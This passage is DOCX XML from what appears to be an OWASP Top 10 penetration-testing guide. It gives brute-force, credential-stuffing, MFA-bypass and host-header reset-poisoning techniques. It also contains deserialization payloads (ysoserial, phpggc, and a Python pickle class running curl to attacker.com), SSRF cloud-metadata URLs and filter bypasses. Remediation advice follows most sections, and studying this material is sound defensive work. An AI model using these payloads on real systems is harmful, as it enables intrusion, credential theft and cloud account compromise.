        <w:t xml:space="preserve">Technology fingerprinting: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whatweb https://target.com -v</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Look for: CMS version, framework, server software, JS libraries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Browser: Wappalyzer extension shows detected technologies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Check HTTP headers: Server, X-Powered-By, X-AspNet-Version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Check HTML source and JS bundles for version strings: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curl -s https://target.com | grep -i "version\|ver\|v[0-9]"</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curl -s https://target.com/assets/main.js | grep -i "jquery\|version"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Exposed manifest files — check these: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/package.json        → Node.js dependencies with versions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/composer.json       → PHP dependencies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/requirements.txt    → Python dependencies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/Gemfile             → Ruby dependencies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/pom.xml             → Java Maven dependencies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/build.gradle        → Java Gradle dependencies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6.2 CVE Scanning</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Nuclei CVE templates — fast and comprehensive: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nuclei -u https://target.com -t /nuclei-templates/cves/ -severity critical,high</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Search for specific CVEs after identifying the technology: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searchsploit "Apache 2.4.49"</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searchsploit "jQuery 1.x"</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searchsploit "Log4j"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Retire.js — client-side JS library vulnerability scanning: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retire --js --path ./downloaded_js_files/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Or use the browser extension: Retire.js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6.3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Maintain a Software Bill of Materials (SBOM). Subscribe to CVE feeds for all components you use. Use dependency scanning tools like OWASP Dependency-Check, Snyk, or GitHub Dependabot in your CI/CD pipeline. Remove unused dependencies. Prefer smaller dependency trees. Never delay patching critical CVEs.</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A07 — Identification &amp; Authentication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HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7860"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="D35400" w:sz="4"/>
              <w:left w:val="single" w:color="D35400" w:sz="4"/>
              <w:bottom w:val="single" w:color="D35400" w:sz="4"/>
              <w:right w:val="single" w:color="D35400" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FDEBD0" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Weaknesses in how users are identified and authenticated — brute force, credential stuffing, session fixation, weak password recovery, and MFA bypass.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="154360"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">7.1 Username Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Username enumeration occurs when the application reveals whether an account exists based on different error messages, response times, or HTTP status codes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Detection — compare responses for valid vs invalid usernames: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Invalid user: "User not found"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Valid user:   "Wrong password"   ← different message = enumerable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Also check: response time difference, HTTP status codes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Use Burp Intruder to automate: measure response length and time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ffuf -u https://target.com/login -X POST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-d "username=FUZZ&amp;password=wrongpass"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 /usr/share/seclists/Usernames/top-usernames-shortlist.txt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-mc all -ms 200  # Filter by response size variation</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7.2 Brute Force &amp; Credential Stuffing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Brute force with Hydra:</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hydra -l admin -P /usr/share/wordlists/rockyou.txt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target.com http-post-form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"/login:user=^USER^&amp;pass=^PASS^:Invalid credentials"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 20 -w 30</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Credential stuffing — using leaked email:password combos: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ffuf -u https://target.com/login -X POST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-d "email=FUZZUSER&amp;password=FUZZPASS" \</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 combo_list.txt:FUZZUSER \   # format: email:password pairs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-mode pitchfork</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Check for account lockout — is brute force even possible?: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After 5-10 failed attempts, does the account lock?</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Does IP-based rate limiting kick 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Try: rotating IPs, using X-Forwarded-For header to bypass IP lockout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X-Forwarded-For: 1.2.3.FUZZ</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X-Originating-IP: 1.2.3.FUZZ</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7.3 Session Management Attacks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Session fixation — does token rotate after login?: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1. Note session token BEFORE logging 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2. Log in successfully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3. Is the token the same? If YES → session fixation vulnerability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Exploit: attacker sets victim's session token, waits for login, then uses it</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Session token analysis — check for predictability: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Collect 20+ tokens and analyze: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Are they sequential? (token_1001, token_1002...)</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Are they base64 of predictable data? (echo "user:1234" | base64)</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Low entropy? Use Burp Sequencer to measure entropy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Timestamp-based? Convert hex to decimal to check</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7.4 MFA Bypass Techniques</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Common MFA bypass methods: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1. Response manipulation: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POST /verify-otp → {"success": false, "2fa_required": true}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Modify to:       → {"success": true, "2fa_required": false}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2. Skip step — directly access post-login endpoint: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/login → /verify-2fa → /dashboard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Test:   /login → /dashboard  (skipping 2FA step)</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3. OTP in response body — check if OTP is returned in API response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POST /send-otp → check if response contains {"otp": "123456"}</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4. Code reuse — can a used OTP code be replayed?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5. Null/empty OTP — try submitting 000000, null, empty string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6. Brute force OTP if no lockout (6-digit = 1M possibilities)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7.5 Host Header Injection — Password Reset</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Manipulate reset link destination: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POST /forgot-password HTTP/1.1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Host: evil.com                   ← Change the Host header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Content-Type: application/x-www-form-urlencoded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email=victim@target.com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If server uses Host header to build reset URL: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Email sent contains: https://evil.com/reset?token=SECRET_TOKEN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Victim clicks → attacker captures token on evil.com server</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7.6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Implement account lockout after 5-10 failed attempts with exponential backoff. Use multi-factor authentication for all accounts. Regenerate session tokens after every authentication event. Use cryptographically random session tokens with sufficient entropy (128+ bits). Implement password breach checking (HaveIBeenPwned API). Store passwords with bcrypt/scrypt/Argon2. Validate OTPs server-side with strict expiry and single-use enforcement.</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A08 — Software &amp; Data Integrity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HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7860"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="D35400" w:sz="4"/>
              <w:left w:val="single" w:color="D35400" w:sz="4"/>
              <w:bottom w:val="single" w:color="D35400" w:sz="4"/>
              <w:right w:val="single" w:color="D35400" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FDEBD0" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Covers insecure deserialization, CI/CD pipeline integrity, and software update mechanisms that do not verify integrity — allowing code injection at the infrastructure level.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="154360"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">8.1 Insecure Deserialization</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Deserialization of untrusted data occurs when an application accepts serialized objects from users and deserializes them without validation. This can lead to RCE, privilege escalation, and DoS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Java deserialization — ysoserial payloads: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Identify Java serialized data: starts with 0xACED 0x0005 or "rO0AB"</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Decode base64 cookie → check for rO0AB prefix</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java -jar ysoserial.jar CommonsCollections6 'curl http://attacker.com/rce' | base64</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java -jar ysoserial.jar Spring1 'curl http://attacker.com/rce' | base64</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java -jar ysoserial.jar ROME 'curl http://attacker.com/rce' | base64</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Send as Cookie, POST body, or any parameter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Use URLDECODE if needed before sending</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">PHP object injection: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Look for: O:4:"User":1:{s:4:"role";s:4:"user";}  in cookies/params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Modify:   O:4:"User":1:{s:4:"role";s:5:"admin";}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Gadget chains — find PHP classes with __wakeup() or __destruct()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phpggc tool for PHP gadget chains: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phpggc Laravel/RCE1 system "id" -b</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phpggc Symfony/RCE4 exec "curl attacker.com" -b</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Python pickle deserialization — RCE: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import pickle, os, base64</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class Exploit(object):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def __reduce__(self):</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return (os.system, ('curl http://attacker.com/`id`',))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print(base64.b64encode(pickle.dumps(Exploit())).decode())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Send this as pickled object in cookie or API parameter</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8.2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Do not accept serialized objects from untrusted sources. If deserialization is required, implement integrity checks (HMAC) before deserializing. Use language-safe data formats (JSON, XML) instead of binary serialization. Implement deserialization monitoring and alerting. For CI/CD, verify digital signatures on all artifacts and pipeline scripts.</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A09 — Security Logging &amp; Monitoring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7D6608" w:sz="6"/>
              <w:left w:val="single" w:color="7D6608" w:sz="6"/>
              <w:bottom w:val="single" w:color="7D6608" w:sz="6"/>
              <w:right w:val="single" w:color="7D6608" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:fill="7D660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MEDIUM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7860"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="7D6608" w:sz="4"/>
              <w:left w:val="single" w:color="7D6608" w:sz="4"/>
              <w:bottom w:val="single" w:color="7D6608" w:sz="4"/>
              <w:right w:val="single" w:color="7D6608" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="F9E79F" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Without proper logging, attacks go undetected. This category covers the absence of audit logging, alerting, and monitoring — an auditing check during pentests.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">During a pentest, logging failures are validated by performing observable attack activity and then verifying whether the defender's logging captured it. The focus is on detection capability, not exploitation.</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9.1 Testing Logging Coverage</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Perform these actions and verify whether they appear in logs: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1. 50+ failed login attempts on one account → was an alert triggered?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2. Successful login from a new country/IP → anomaly detection?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3. Access to admin endpoints with user-level token → logged?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4. SQL injection payload in URL → WAF alert? IDS rule?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5. Downloading large amounts of data → DLP alert?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Verbose error messages — information leakage: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Send malformed requests to trigger error pages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GET /api/user?id=1'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Look for: SQL error text, stack traces, file paths, framework versions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These are findings — they reveal internal architecture</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Log injection — poison logs with crafted input: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In username or any logged field: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username=admin
2024-01-01 00:00:00 INFO: User admin logged in successfully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URL-encoded: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username=admin%0a2024-01-01+00%3a00%3a00+INFO%3a+Login+success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This forges log entries and can confuse log analysis tools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9.2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Log all authentication events, access control failures, and input validation failures with sufficient context (user, IP, timestamp, endpoint). Centralize logs in a SIEM. Set up alerting on anomalous patterns. Protect logs from tampering. Display generic error messages to users and log detailed errors server-side. Conduct regular log reviews.</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A10 — Server-Side Request Forgery (SSRF)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35400" w:sz="6"/>
              <w:left w:val="single" w:color="D35400" w:sz="6"/>
              <w:bottom w:val="single" w:color="D35400" w:sz="6"/>
              <w:right w:val="single" w:color="D35400" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:fill="D354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HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7860"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="D35400" w:sz="4"/>
              <w:left w:val="single" w:color="D35400" w:sz="4"/>
              <w:bottom w:val="single" w:color="D35400" w:sz="4"/>
              <w:right w:val="single" w:color="D35400" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FDEBD0" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">SSRF allows an attacker to induce the server to make HTTP requests to an arbitrary domain — including internal services, cloud metadata, and localhost — that the attacker cannot directly reach.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SSRF is critical in cloud environments. When an EC2 instance, Lambda, or GCP VM is compromised via SSRF, the attacker can reach the cloud metadata service and obtain IAM credentials, which typically leads to full cloud account compromise.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10.1 Finding SSRF-Prone Parameters</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Parameter names that frequently cause SSRF — scan for these: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         imageUrl=     fetch=        load=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src=         dest=         redirect=     uri=</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path=        callback=     webhook=      feed=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host=        site=         html=         resource=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proxy=       request=      target=       open=</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Also test these less obvious locations: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SVG files that are parsed on upload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XML/XLSX/DOCX imports (XXE vector overlaps with SSRF)</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PDF generators (wkhtmltopdf, weasyprint)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Webhook configuration in settings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Import by URL functionality</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10.2 Basic SSRF Payloads</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Internal network probing:</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url=http://127.0.0.1/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url=http://localhost/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url=http://127.0.0.1:8080/admin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url=http://192.168.1.1/           ← router admin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url=http://10.0.0.1/              ← internal server</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Cloud metadata endpoints — HIGH VALUE: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AWS EC2 Metadata (IMDSv1 — no auth required):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url=http://169.254.169.254/latest/meta-data/</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url=http://169.254.169.254/latest/meta-data/iam/security-credentials/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url=http://169.254.169.254/latest/user-data/</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Google Cloud Platform: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url=http://metadata.google.internal/computeMetadata/v1/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Add header: Metadata-Flavor: Google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Azure IMDS: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url=http://169.254.169.254/metadata/instance?api-version=2021-02-01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Add header: Metadata: true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10.3 SSRF Filter Bypass Techniques</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">IP address encoding bypasses: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http://2130706433/          ← 127.0.0.1 in decimal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http://0x7f000001/          ← 127.0.0.1 in hex</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http://0177.0.0.1/          ← 127.0.0.1 in octal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http://127.1/               ← short form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http://[::1]/               ← IPv6 localhost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http://[::ffff:127.0.0.1]/  ← IPv4-mapped IPv6</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
